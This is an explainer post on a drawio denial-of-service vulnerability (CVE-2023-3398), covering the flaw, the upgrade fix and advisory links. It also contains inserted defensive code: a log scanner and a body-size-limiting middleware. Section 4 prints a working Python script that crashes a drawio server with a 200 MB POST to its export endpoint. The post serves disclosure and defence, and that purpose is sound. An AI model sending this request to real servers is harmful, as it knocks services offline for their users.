CVE-2023-3398 - Denial of Service in drawio Before 18.1.3 – Everything You Need to Know

In June 2023, a vulnerability was discovered in the popular diagramming tool drawio (jgraph/drawio) that could crash the whole server. The bug, tracked as CVE-2023-3398, allows remote users to cause a Denial of Service (DoS) simply by sending a crafted request.

This issue affects versions before 18.1.3 of drawio.

2. What Is drawio?

drawio is a free and open source tool for making diagrams and flowcharts. Many organizations host it on their own servers or use it as part of Confluence, Jira, or other collaboration suites.

Having a DoS vulnerability in such a tool is risky, because a malicious actor could intentionally crash the service, causing an outage for every user.

3. The Vulnerability Explained

CVE-2023-3398 is a Denial of Service vulnerability.

How Does It Work?

In versions before 18.1.3, drawio lacked proper input validation in a function that processes image data. A specially crafted request, in particular a very large or malformed payload, triggers an unhandled exception and crashes the application. No authentication is required: anyone who can reach the server can crash it.

Why Is That Bad?

It means that anyone who can reach the server (no login needed) can send the bad data and knock your drawio server offline for everyone else.
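Because the attack needs no login, the first signal a defender gets is the request itself. The following script is an added example (mine, not from this post or from the drawio project): it scans constructed access-log lines for POSTs to the export endpoint whose total request size is far above anything a legitimate diagram export produces, and counts repeats per source address. It assumes an nginx-style combined log with `$request_length` appended as the final field, the `/export` path used later in this post, and a 1 MiB threshold; all three are assumptions to adapt to your own deployment.

```python
"""Flag oversized POSTs to a drawio export endpoint in web-server access logs.

Added example; not code from the post or from the drawio project.
Assumptions: nginx combined log format with $request_length appended as the
last field, the '/export' path, and a 1 MiB threshold.
"""
import re
from collections import Counter

# Combined log format plus a trailing request-length field (assumed log layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<resp_bytes>\d+|-) "[^"]*" "(?P<ua>[^"]*)" '
    r'(?P<req_len>\d+)$'
)

MAX_REQUEST_BYTES = 1 * 1024 * 1024   # assumption: 1 MiB is generous for a diagram export
EXPORT_PATHS = ("/export",)           # assumption: path taken from the post's request

# Constructed sample: one normal export, two oversized attempts from one client
# that ended in 502s, and an unrelated GET.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Jun/2023:11:15:00 +0000] "POST /export HTTP/1.1" 200 4096 "-" "Mozilla/5.0" 18231
10.0.0.9 - - [26/Jun/2023:11:16:02 +0000] "POST /export HTTP/1.1" 502 0 "-" "python-requests/2.31.0" 209715312
10.0.0.9 - - [26/Jun/2023:11:16:40 +0000] "POST /export HTTP/1.1" 502 0 "-" "python-requests/2.31.0" 209715312
10.0.0.7 - - [26/Jun/2023:11:17:00 +0000] "GET /index.html HTTP/1.1" 200 1200 "-" "Mozilla/5.0" 311
"""


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    fields = m.groupdict()
    fields["req_len"] = int(fields["req_len"])
    return fields


def find_oversized(log_text, limit=MAX_REQUEST_BYTES, paths=EXPORT_PATHS):
    """Return every POST to an export path whose request exceeded the limit."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable lines are skipped, not treated as hits
        if rec["method"] == "POST" and rec["path"] in paths and rec["req_len"] > limit:
            findings.append(rec)
    return findings


def summarize_by_ip(findings):
    """Count oversized attempts per source address; repeats suggest a deliberate DoS."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = find_oversized(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['ip']} POST {h['path']} {h['req_len']} bytes -> HTTP {h['status']}")
    print("per-source counts:", dict(summarize_by_ip(hits)))
```

The 502s next to the oversized requests are what a crashed backend looks like from the proxy's side; correlating the two is more reliable than alerting on size alone.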

4. Crafting the Malicious Request

The details come from the original patch commit and security advisories.

The vulnerable endpoint processes images from user input. If you POST a malformed or huge image payload, the server runs out of memory or hits an unhandled exception, causing a crash.

Here's a simple way to trigger a crash with a malicious POST request:

import requests

# Replace with your drawio host
URL = "http://drawio.example.com/export"

# Send a gigantic payload to cause memory exhaustion
payload = "A" * (1024 * 1024 * 200)  # 200MB!

headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

data = {
    "xml": payload,
    "format": "svg"
}

response = requests.post(URL, data=data, headers=headers)
print("Status:", response.status_code)
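The hardened counterpart to that request is a size limit enforced before the export handler ever reads the body. The WSGI middleware below is an added example of mine, not drawio's own code; it assumes a deployment where the export handler runs as a WSGI app, the `/export` path from the request above, and a 1 MiB ceiling, and `export_app` is a stand-in for the real handler. It checks the declared Content-Length and also caps how many bytes it actually reads, because a client that omits or understates Content-Length (chunked transfer) would otherwise still push the full payload into memory.

```python
"""Reject oversized request bodies before an export handler can process them.

Added example; not drawio project code. Assumptions: a WSGI deployment, the
'/export' path, and a 1 MiB limit. export_app is a constructed stand-in.
"""
from io import BytesIO

MAX_BODY_BYTES = 1 * 1024 * 1024  # assumption: 1 MiB is ample for a diagram's XML
GUARDED_PATHS = {"/export"}       # assumption: endpoint name taken from the request above


class BodySizeLimit:
    """WSGI middleware that rejects oversized bodies before the wrapped app sees them.

    Two checks are needed: the declared Content-Length, and a hard cap on the
    bytes actually read, since Content-Length can be missing or wrong.
    """

    def __init__(self, app, max_bytes=MAX_BODY_BYTES, paths=GUARDED_PATHS):
        self.app = app
        self.max_bytes = max_bytes
        self.paths = paths

    def __call__(self, environ, start_response):
        if environ.get("PATH_INFO") in self.paths and environ.get("REQUEST_METHOD") == "POST":
            declared = environ.get("CONTENT_LENGTH") or ""
            if declared.isdigit() and int(declared) > self.max_bytes:
                return self._reject(start_response)  # cheap check, nothing read yet
            # Read at most max_bytes + 1: enough to detect an over-limit body
            # without ever buffering the whole payload.
            body = environ["wsgi.input"].read(self.max_bytes + 1)
            if len(body) > self.max_bytes:
                return self._reject(start_response)
            # Hand the bounded body to the real app as a fresh stream.
            environ["wsgi.input"] = BytesIO(body)
            environ["CONTENT_LENGTH"] = str(len(body))
        return self.app(environ, start_response)

    @staticmethod
    def _reject(start_response):
        start_response("413 Payload Too Large", [("Content-Type", "text/plain")])
        return [b"request body exceeds limit\n"]


def export_app(environ, start_response):
    """Stand-in for the real export handler (constructed for this example)."""
    size = len(environ["wsgi.input"].read())
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [f"exported {size} bytes\n".encode()]


def run_request(app, path, body, declare_length=True):
    """Drive a WSGI app with a constructed POST; return (status, response body)."""
    environ = {
        "REQUEST_METHOD": "POST",
        "PATH_INFO": path,
        "CONTENT_LENGTH": str(len(body)) if declare_length else "",
        "wsgi.input": BytesIO(body),
    }
    captured = {}

    def start_response(status, headers):
        captured["status"] = status

    out = b"".join(app(environ, start_response))
    return captured["status"], out


if __name__ == "__main__":
    guarded = BodySizeLimit(export_app, max_bytes=1024)
    print(run_request(guarded, "/export", b"<mxfile></mxfile>"))
    print(run_request(guarded, "/export", b"A" * 4096))                        # declared size too big
    print(run_request(guarded, "/export", b"A" * 4096, declare_length=False))  # undeclared, still capped
```

Upgrading to 18.1.3 fixes the underlying defect; a limit like this is a compensating control at the edge, and a reverse proxy's body-size limit (nginx's `client_max_body_size`, for instance) does the same job without touching the application.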

Note:

5. How to Fix the Issue

Good news! The developers patched the bug in version 18.1.3.

Update drawio

- Upgrade to version 18.1.3 or newer as soon as possible.

📢 Official GitHub Advisory:

GHSA-8w42-gwg7-p5mx

📝 CVE Details:

CVE-2023-3398 at NIST NVD

🔒 Patch Commit:

GitHub diff for the patch

📦 Latest Release:

jgraph/drawio Releases

Update now if you host drawio yourself!

Stay secure. If you want to learn more about this or share your experience patching it, leave a comment or join the conversation on GitHub Discussions.

Timeline

Published on: 06/26/2023 11:15:00 UTC
Last modified on: 06/30/2023 13:01:00 UTC